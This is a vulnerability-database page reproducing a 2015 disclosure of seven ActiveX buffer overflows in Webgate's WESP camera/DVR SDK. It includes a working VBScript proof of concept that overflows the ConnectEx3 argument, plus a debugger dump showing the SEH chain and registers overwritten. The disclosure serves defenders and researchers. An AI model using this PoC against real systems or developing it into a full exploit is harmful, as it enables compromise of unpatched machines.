Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Webgate Buffer Overflow

🗓️ 24 Feb 2015 00:00:00Reported by Praveen DarshanamType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

WESP SDK WESPMonitorCtrl ActiveX LoadImage Buffer Overflow in Webgate technology's image processing O/S and web server camera

Code
`Webgate technology is focused on digital image processing, embedded system  
design and networking to produce embedded O/S and web server cameras  
providing real time images. We are also making superior network stand-alone  
DVRs by applying our accumulated network and video solution knowledge.  
  
WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both  
network DVR and network camera.  
  
Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax  
Technology, Fujitsu AOS Technology, inc  
  
http://www.webgateinc.com/wgi/eng/#2  
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html  
  
Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage  
Buffer Overflow  
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword  
Buffer Overflow  
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX  
LoadImageEx Buffer Overflow  
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX  
Connect Buffer Overflow  
Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow  
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect  
Buffer Overflow  
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX  
ConnectEx3 Buffer Overflow  
  
  
CompanyName WebgateInc  
FileDescription WESPConfig Module  
FileVersion 1, 6, 42, 0  
InternalName WESPConfig  
LegalCopyright Copyright (C) 2004-2010  
OriginalFileName WESPConfig.DLL  
ProductName WESPConfig Module  
ProductVersion 1, 6, 42, 0  
  
******************PoC for one of the above Vulnerabilities***********  
<html>  
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>  
</object>  
<!--  
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"  
prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As  
String , ByVal Port As Integer , ByVal UserID As String , ByVal Password  
As String , ByVal extcompany As Long , ByVal authType As Long , ByVal  
AdditionalCode As String )"  
memberName = "ConnectEx3"  
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"  
argCount = 8  
-->  
<script language='vbscript'>  
  
arg1=1  
arg2=String(1044, "A")  
arg3=1  
arg4="defaultV"  
arg5="defaultV"  
arg6=1  
arg7=1  
arg8="defaultV"  
  
target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8  
  
</script>  
</html>  
******************************  
Stack trace for above PoC  
Exception Code: ACCESS_VIOLATION  
Disasm: 76ACD33D MOV CX,[EAX]  
  
Seh Chain:  
--------------------------------------------------  
1 41414141  
  
  
Called From Returns To  
--------------------------------------------------  
msvcrt.76ACD33D WESPPlayback.999539  
WESPPlayback.999539 41414141  
41414141 22E5E0  
22E5E0 2F712C  
2F712C 41414141  
41414141 41414141  
41414141 41414141  
41414141 41414141  
  
  
Registers:  
--------------------------------------------------  
EIP 76ACD33D  
EAX 41414141  
EBX 039E0040 -> 009DF298  
ECX E0551782  
EDX 41414141  
EDI 76AD4137 -> 8B55FF8B  
ESI 76ACD335 -> 8B55FF8B  
EBP 0022E56C -> 039E0020  
ESP 0022E56C -> 039E0020  
  
  
Block Disassembly:  
--------------------------------------------------  
76ACD333 NOP  
76ACD334 NOP  
76ACD335 MOV EDI,EDI  
76ACD337 PUSH EBP  
76ACD338 MOV EBP,ESP  
76ACD33A MOV EAX,[EBP+8]  
76ACD33D MOV CX,[EAX] <--- CRASH  
76ACD340 INC EAX  
76ACD341 INC EAX  
76ACD342 TEST CX,CX  
76ACD345 JNZ SHORT 76ACD33D  
76ACD347 SUB EAX,[EBP+8]  
76ACD34A SAR EAX,1  
76ACD34C DEC EAX  
76ACD34D POP EBP  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 41414141  
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+20 00000829  
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA  
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
  
Stack Dump:  
--------------------------------------------------  
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................]  
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......]  
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............]  
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]  
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]  
  
P.S. CERT tried to coordinate with the vendor for fixing the issues but  
there wasn't any response from vendor  
  
Best Regards,  
Praveen Darshanam  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Feb 2015 00:00Current
0.8Low risk
Vulners AI Score0.8
webgate technologyembedded system designnetwork dvrshoneywellsamsung techwinboschpentax technologyfujitsu aos technologyvulnerabilitywesp sdkwespmonitorctrlactivexloadimage buffer overflow
30